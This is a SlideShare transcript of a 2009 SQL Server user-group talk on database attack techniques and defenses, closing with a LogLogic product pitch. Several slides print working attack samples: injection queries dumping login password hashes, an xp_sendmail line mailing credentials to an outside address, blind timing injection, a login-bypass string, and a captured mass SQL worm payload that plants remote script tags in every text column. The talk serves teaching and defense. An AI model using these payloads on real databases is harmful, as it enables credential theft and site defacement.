SlideShare a Scribd company logo

LogLogic SQL Server Hacking DBs April09

Mark Ginnebaugh
Mark Ginnebaugh

Sudha Iyer / LogLogic presentation: Think Like a Hacker: Database Attack Vectors and How to Thwart Them. Presentation to the San Francisco SQL Server User Group in April 2009.

Technology
1 of 34
Download to read offline
Think like a hacker DB attack vectors, Thwarting techniques Presented to the San Francisco SQL Server User Group presented by Sudha Iyer | Apr 8, 2009 www.BayAreaSQL.org Leader: Mark Ginnebaugh
What’s This Presentation All About? Is there an enemy ? Common Database Hacking Techniques Raising the bar for the hackers © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 2
Why Protect The Database? Databases hold sensitive information – and lots of it: Customer data, accounts, transactions, payroll, investor data • When a breach occurs, damage is significant: Direct damages and costs • Bad publicity • Regulatory penalties • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 3
Some Recent Examples July 2005 – January 2007: TJX 45.7M+ credit/debit card records stolen • Sophisticated attack (WiFi -> Internal Network -> DB) • Result: data sold to data brokers and used in many scams, TJX faces lawsuits and • losses of $25M until May 07 (will grow considerably) July 2007 – Fidelity National Information Services Bank and credit data of 2.3M customers - Stolen by a DBA • And many more breaches… not only in the U.S. (e.g. Home Office breach in the U.K.) Many breaches are unknown or not made public or remain undetected Over 216,686,736 identifiable records in US only - http://www.privacyrights.org/ar/ChronDataBreaches.htm © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 4
Know Your Enemy Unauthorized access - not just hackers Too many privileges • Internal attacks Disgruntled employees • Just trying to get the job done • Industrial espionage, Identity theft, etc. • Look around you!!! • External attacks Web or network access © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 5
The Problems Does a hacker need DBA access? Myriad of privileges System level, Application level, Data access • Any privilege in the right circumstances can be an issue • Other issues Network issues, incorrect configuration • Too many features – large attack surface • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 6
The Problems Most typical problems of real world databases Weak / default passwords for database accounts • Missing patches / patchsets – see • http://en.wikipedia.org/wiki/SQL_slammer_(computer_worm) Unsecure customer / 3rd party code (T-SQL stored • procedures) © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 7
Basic Hacking Techniques presented by Sudha Iyer | Apr 8, 2009
Discovering databases Reconnaissance: nmap - http://nmap.org/ SQLPing3 - http://sqlsecurity.com/ © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 9
Is password the weakest link? Many brute force tools out there • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 10
Powerful Tools Are Easily Available © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 11
Social Engineering Wait for your DBA to go for a coffee break Go to his desktop Open Management Studio Add yourself as an administrator to the database of your choice This can be easily scripted and put on a USB drive © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 12
SQL Injection Wikipedia – is a technique that exploits a security vulnerability occurring in • the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 13
SQL Injection Exists in any layer of any application Web Applications • Stored program units • Build in User created Has many forms Extra queries, unions, order by, sub selects • Easily avoided Bind variables, strong typing • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 14
SQL Injection Types In band – Use injection to return extra data Part of normal result set (unions) • In error messages • Out of band – Use alternative route like UTL_HTTP, DNS to extract data Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurements and more © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 15
SQL Injection In-band select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; select name, password from sys.syslogins where password is not null 14417807 1209 adventure-worksguy1 16 Production Technician - WC60 1 1972-05-15 00:00:00.000 M M 1996-07-31 00:00:00.000 0 21 30 1 AAE1D04A-C237-4974-B4D5-935247737718 2004-07-31 00:00:00.000 虀뛎༷ 醜‫ﬥ‬ 绳 sa 2 쵌藌 街Ḷ왏�컕 test 3 Now, just attack the password hash using either using brute-force or dictionary. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 16
SQL Injection In-Band Using errors – inject the following: 1 and 1 in (select @@version) Result is: Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) ' to data type int. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 17
SQL Injection Out-of-band Send information via HTTP/SMTP/DNS to an external site: select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null' ; © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 18
Blind SQL Injection Example code: If is_srvrolemember('sysdamin') > 0) waitfor delay '0:0:5' If (ascii(substring(@string, @byte, 1)) & (power(2, @bit))) > 0 waitfor '0:0:5' © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 19
SQL Injection – Web Application Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = '' © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 20
Real World Example Mass SQL worm in the wild since April Enumerates all query/input fields and tries various SQL injection techniques Iterates on all text fields in the database and adds a link to the Jscript Result? Data Leakage … broad daylight! © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 21
Real World Example SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C415245204054205641524348415228323535292C4043205641524348415228323535292044454 34C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E61 6D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D33352 04F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7 2204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C45284 04046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D2053455 4205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2 9292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F736 3726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4 04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F 7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC Wow, how to read this? © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 22
Real World Example DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(’UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+”<script src=http://www.chkadw.com/b.js></script>”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 23
Real World Example The interesting part is here: ’UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR(4000), ['SOME_TEXT_COL']))+”<script src=http://www.chkadw.com/b.js></script>”’ Lesson Learned? Never use NoScript - even for trusted sites © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 24
Thwarting these attacks presented by Sudha Iyer | Apr 8, 2009
Try the off the shelf tools yourself Think like a hacker Learn about exploits • Always look for security issues • Configuration, permissions, bugs Learn and use available tools nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, etc. • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 26
Develop an information security policy ...and enforce it Apply patch sets and upgrades Easier said than done • Check for default and weak passwords regularly Secure the network Valid node checking + firewall • Use encryption • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 27
Secure By Default; Secure Coding Practices Install only what you use, remove all else Reduce your attack surface • The least privilege principle Lock down packages • System access, file access, network access Encrypt critical data Use secure coding techniques Bind variables, input validation • Clear ownership of security issues • http://checklists.nist.gov/chklst_detail.cfm?config_id=157 • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 28
Publish Coding Standards, Peer Review Avoid hardcoding username/password Wrap sensitive/important program code – even if not really safe Use full qualified names for function and procedure calls Always validate user/database input Be careful with dynamic statements (Cursors, SQL-Statements, …) Be careful with file access Be careful with OS command execution © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 29
Deploy Real Tools: Host-based Sensor Technology Host-based All database transactions, Sensor externally or internally initiated, must go through the shared / cache memory Minimal impact on performance – typically less than 5% of a single CPU Stored DBMS Bequeath Proc Local Conn No business interruption (no Shared reboots or restarts) Trigger Memory Listener Supports SQL Server, Oracle, Network Conn Sybase View Data © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 30
Granular Policy-based Detection Security policies determined by granular rules: Predefined (Virtual Patching) – zero effort / Wizard-driven templates for • regulations / Administrator-defined Rule Policy Layers Virtual Patching Trigger Action Rule 1 1 Virtual Patching Trigger Action Rule Rule 2 2 Rule Compliance Templates IF Compliance Templates App<>’SAPFinance’ AND object = Rule 3 3 Rule ‘CC_Table’ THEN Community Best Practices Community Best Practices Send HIGH Alert Rule 4 4 Rule Send mail to: security team Terminate User Session Rule 5 5 Customer-Defined Rule Customer-Defined Quarantine User 60 minutes © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 31
LogLogic Database Security Manager Meet Compliance Requirements » Privileged user monitoring » Enforce Segregation of duties » Protect sensitive data » Audit trail and reporting » Keep database patches up to date » Compensating control for protecting » unencrypted data Complete Database Security » Protect against internal / external attacks » Cover all copies, locations and platforms » Operate in all environments (encryption, » clustering, virtualization) Defend against all types of attacks » “Always on” protection in real-time » © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 32
Integration with LogLogic Log Management Platform Database Security Manager LogLogic Open Log Management Granular policy-based detection Compliance reporting » » Automated database protection Long term archival » » Real-time virtual patching Forensics analysis » » © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 33
Questions? presented by Sudha Iyer | Apr 8, 2009

Recommended

Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionSatyajit Mukherjee
 
Penetration Testing as an auditing tool
Penetration Testing as an auditing toolPenetration Testing as an auditing tool
Penetration Testing as an auditing toolsyrinxtech
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web Appelliando dias
 
Sql injection
Sql injectionSql injection
Sql injectionThe Avi Sharma
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsOlivier DASINI
 
Secure pl-sql-coding
Secure pl-sql-codingSecure pl-sql-coding
Secure pl-sql-codingTrần Bình Hậu
 
New Security Issues related to Embedded Web Servers
New Security Issues related to Embedded Web ServersNew Security Issues related to Embedded Web Servers
New Security Issues related to Embedded Web ServersEric Vétillard
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security TestingAlan Kan
 

Recommended

Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionSatyajit Mukherjee
 
Penetration Testing as an auditing tool
Penetration Testing as an auditing toolPenetration Testing as an auditing tool
Penetration Testing as an auditing toolsyrinxtech
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web Appelliando dias
 
Sql injection
Sql injectionSql injection
Sql injectionThe Avi Sharma
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsOlivier DASINI
 
Secure pl-sql-coding
Secure pl-sql-codingSecure pl-sql-coding
Secure pl-sql-codingTrần Bình Hậu
 
New Security Issues related to Embedded Web Servers
New Security Issues related to Embedded Web ServersNew Security Issues related to Embedded Web Servers
New Security Issues related to Embedded Web ServersEric Vétillard
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security TestingAlan Kan
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Using the Cloud
Using the CloudUsing the Cloud
Using the CloudPhil Reynolds
 
Top 5 Encryption Myths for IBM i Users
Top 5 Encryption Myths for IBM i UsersTop 5 Encryption Myths for IBM i Users
Top 5 Encryption Myths for IBM i UsersPrecisely
 
CanSecWest (1)
CanSecWest (1)CanSecWest (1)
CanSecWest (1)Abhishek Singh
 
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...IRJET Journal
 
Secure Coding for Java - An introduction
Secure Coding for Java - An introductionSecure Coding for Java - An introduction
Secure Coding for Java - An introductionSebastien Gioria
 
2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pchSébastien GIORIA
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSebastien Gioria
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCiNPA Security SIG
 
AP Takeover Attacks
AP Takeover AttacksAP Takeover Attacks
AP Takeover AttacksEric Goldman
 
Sample PPT Format.pptx E-commerce website for login
Sample PPT Format.pptx E-commerce website for loginSample PPT Format.pptx E-commerce website for login
Sample PPT Format.pptx E-commerce website for loginnaveendurga557
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Webinar: Cloud Data Masking - Tips to Test Software Securely
Webinar: Cloud Data Masking - Tips to Test Software Securely Webinar: Cloud Data Masking - Tips to Test Software Securely
Webinar: Cloud Data Masking - Tips to Test Software Securely Skytap Cloud
 
Perf Tuning Best Practices
Perf Tuning Best PracticesPerf Tuning Best Practices
Perf Tuning Best Practicesguest01bbdd
 
State of the information security nation
State of the information security nationState of the information security nation
State of the information security nationSensePost
 
Oracle11g Security
Oracle11g SecurityOracle11g Security
Oracle11g SecurityInprise Group
 
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!ITCamp
 
Web Database Server Best Practices
Web Database Server Best PracticesWeb Database Server Best Practices
Web Database Server Best Practicessyrinxtech
 
SecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIsSecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIsCiNPA Security SIG
 
IT Infrastructure Through The Public Network Challenges And Solutions
IT Infrastructure Through The Public Network Challenges And SolutionsIT Infrastructure Through The Public Network Challenges And Solutions
IT Infrastructure Through The Public Network Challenges And SolutionsMartin Jackson
 
Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Mark Ginnebaugh
 
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Mark Ginnebaugh
 

More Related Content

Similar to LogLogic SQL Server Hacking DBs April09

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
 
Top 5 Encryption Myths for IBM i Users
Top 5 Encryption Myths for IBM i UsersTop 5 Encryption Myths for IBM i Users
Top 5 Encryption Myths for IBM i UsersPrecisely
 
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...IRJET Journal
 
Secure Coding for Java - An introduction
Secure Coding for Java - An introductionSecure Coding for Java - An introduction
Secure Coding for Java - An introductionSebastien Gioria
 
2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pchSébastien GIORIA
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSebastien Gioria
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCiNPA Security SIG
 
AP Takeover Attacks
AP Takeover AttacksAP Takeover Attacks
AP Takeover AttacksEric Goldman
 
Sample PPT Format.pptx E-commerce website for login
Sample PPT Format.pptx E-commerce website for loginSample PPT Format.pptx E-commerce website for login
Sample PPT Format.pptx E-commerce website for loginnaveendurga557
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Webinar: Cloud Data Masking - Tips to Test Software Securely
Webinar: Cloud Data Masking - Tips to Test Software Securely Webinar: Cloud Data Masking - Tips to Test Software Securely
Webinar: Cloud Data Masking - Tips to Test Software Securely Skytap Cloud
 
Perf Tuning Best Practices
Perf Tuning Best PracticesPerf Tuning Best Practices
Perf Tuning Best Practicesguest01bbdd
 
State of the information security nation
State of the information security nationState of the information security nation
State of the information security nationSensePost
 
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!ITCamp
 
Web Database Server Best Practices
Web Database Server Best PracticesWeb Database Server Best Practices
Web Database Server Best Practicessyrinxtech
 
IT Infrastructure Through The Public Network Challenges And Solutions
IT Infrastructure Through The Public Network Challenges And SolutionsIT Infrastructure Through The Public Network Challenges And Solutions
IT Infrastructure Through The Public Network Challenges And SolutionsMartin Jackson
 

Similar to LogLogic SQL Server Hacking DBs April09 (20)

MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
Using the Cloud
Using the CloudUsing the Cloud
Using the Cloud
 
Top 5 Encryption Myths for IBM i Users
Top 5 Encryption Myths for IBM i UsersTop 5 Encryption Myths for IBM i Users
Top 5 Encryption Myths for IBM i Users
 
CanSecWest (1)
CanSecWest (1)CanSecWest (1)
CanSecWest (1)
 
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
SQL Injection and HTTP Flood DDOS Attack Detection and Classification Based o...
 
Secure Coding for Java - An introduction
Secure Coding for Java - An introductionSecure Coding for Java - An introduction
Secure Coding for Java - An introduction
 
2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch2013 06-27-securecoding-en - jug pch
2013 06-27-securecoding-en - jug pch
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIs
 
AP Takeover Attacks
AP Takeover AttacksAP Takeover Attacks
AP Takeover Attacks
 
Sample PPT Format.pptx E-commerce website for login
Sample PPT Format.pptx E-commerce website for loginSample PPT Format.pptx E-commerce website for login
Sample PPT Format.pptx E-commerce website for login
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Webinar: Cloud Data Masking - Tips to Test Software Securely
Webinar: Cloud Data Masking - Tips to Test Software Securely Webinar: Cloud Data Masking - Tips to Test Software Securely
Webinar: Cloud Data Masking - Tips to Test Software Securely
 
Perf Tuning Best Practices
Perf Tuning Best PracticesPerf Tuning Best Practices
Perf Tuning Best Practices
 
State of the information security nation
State of the information security nationState of the information security nation
State of the information security nation
 
Oracle11g Security
Oracle11g SecurityOracle11g Security
Oracle11g Security
 
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
 
Web Database Server Best Practices
Web Database Server Best PracticesWeb Database Server Best Practices
Web Database Server Best Practices
 
SecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIsSecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIs
 
IT Infrastructure Through The Public Network Challenges And Solutions
IT Infrastructure Through The Public Network Challenges And SolutionsIT Infrastructure Through The Public Network Challenges And Solutions
IT Infrastructure Through The Public Network Challenges And Solutions
 

More from Mark Ginnebaugh

Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Mark Ginnebaugh
 
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Mark Ginnebaugh
 
Platfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big DataPlatfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big DataMark Ginnebaugh
 
Microsoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary KeysMicrosoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary KeysMark Ginnebaugh
 
DesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL ServerDesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL ServerMark Ginnebaugh
 
San Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetingsSan Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetingsMark Ginnebaugh
 
Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013Mark Ginnebaugh
 
Microsoft SQL Server Continuous Integration
Microsoft SQL Server Continuous IntegrationMicrosoft SQL Server Continuous Integration
Microsoft SQL Server Continuous IntegrationMark Ginnebaugh
 
Hortonworks Big Data & Hadoop
Hortonworks Big Data & HadoopHortonworks Big Data & Hadoop
Hortonworks Big Data & HadoopMark Ginnebaugh
 
Microsoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join OperatorsMicrosoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join OperatorsMark Ginnebaugh
 
Microsoft PowerPivot & Power View in Excel 2013
Microsoft PowerPivot & Power View in Excel 2013Microsoft PowerPivot & Power View in Excel 2013
Microsoft PowerPivot & Power View in Excel 2013Mark Ginnebaugh
 
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball ApproachMicrosoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball ApproachMark Ginnebaugh
 
Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012Mark Ginnebaugh
 
Microsoft Data Mining 2012
Microsoft Data Mining 2012Microsoft Data Mining 2012
Microsoft Data Mining 2012Mark Ginnebaugh
 
Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012Mark Ginnebaugh
 
Business Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best PracticesBusiness Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best PracticesMark Ginnebaugh
 
Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence Mark Ginnebaugh
 
Microsoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud ReadyMicrosoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud ReadyMark Ginnebaugh
 
Microsoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data ServicesMicrosoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data ServicesMark Ginnebaugh
 
Microsoft SQL Server PowerPivot
Microsoft SQL Server PowerPivotMicrosoft SQL Server PowerPivot
Microsoft SQL Server PowerPivotMark Ginnebaugh
 

More from Mark Ginnebaugh (20)

Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015
 
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
 
Platfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big DataPlatfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big Data
 
Microsoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary KeysMicrosoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary Keys
 
DesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL ServerDesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL Server
 
San Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetingsSan Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetings
 
Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013
 
Microsoft SQL Server Continuous Integration
Microsoft SQL Server Continuous IntegrationMicrosoft SQL Server Continuous Integration
Microsoft SQL Server Continuous Integration
 
Hortonworks Big Data & Hadoop
Hortonworks Big Data & HadoopHortonworks Big Data & Hadoop
Hortonworks Big Data & Hadoop
 
Microsoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join OperatorsMicrosoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join Operators
 
Microsoft PowerPivot & Power View in Excel 2013
Microsoft PowerPivot & Power View in Excel 2013Microsoft PowerPivot & Power View in Excel 2013
Microsoft PowerPivot & Power View in Excel 2013
 
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball ApproachMicrosoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
 
Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012
 
Microsoft Data Mining 2012
Microsoft Data Mining 2012Microsoft Data Mining 2012
Microsoft Data Mining 2012
 
Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012
 
Business Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best PracticesBusiness Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best Practices
 
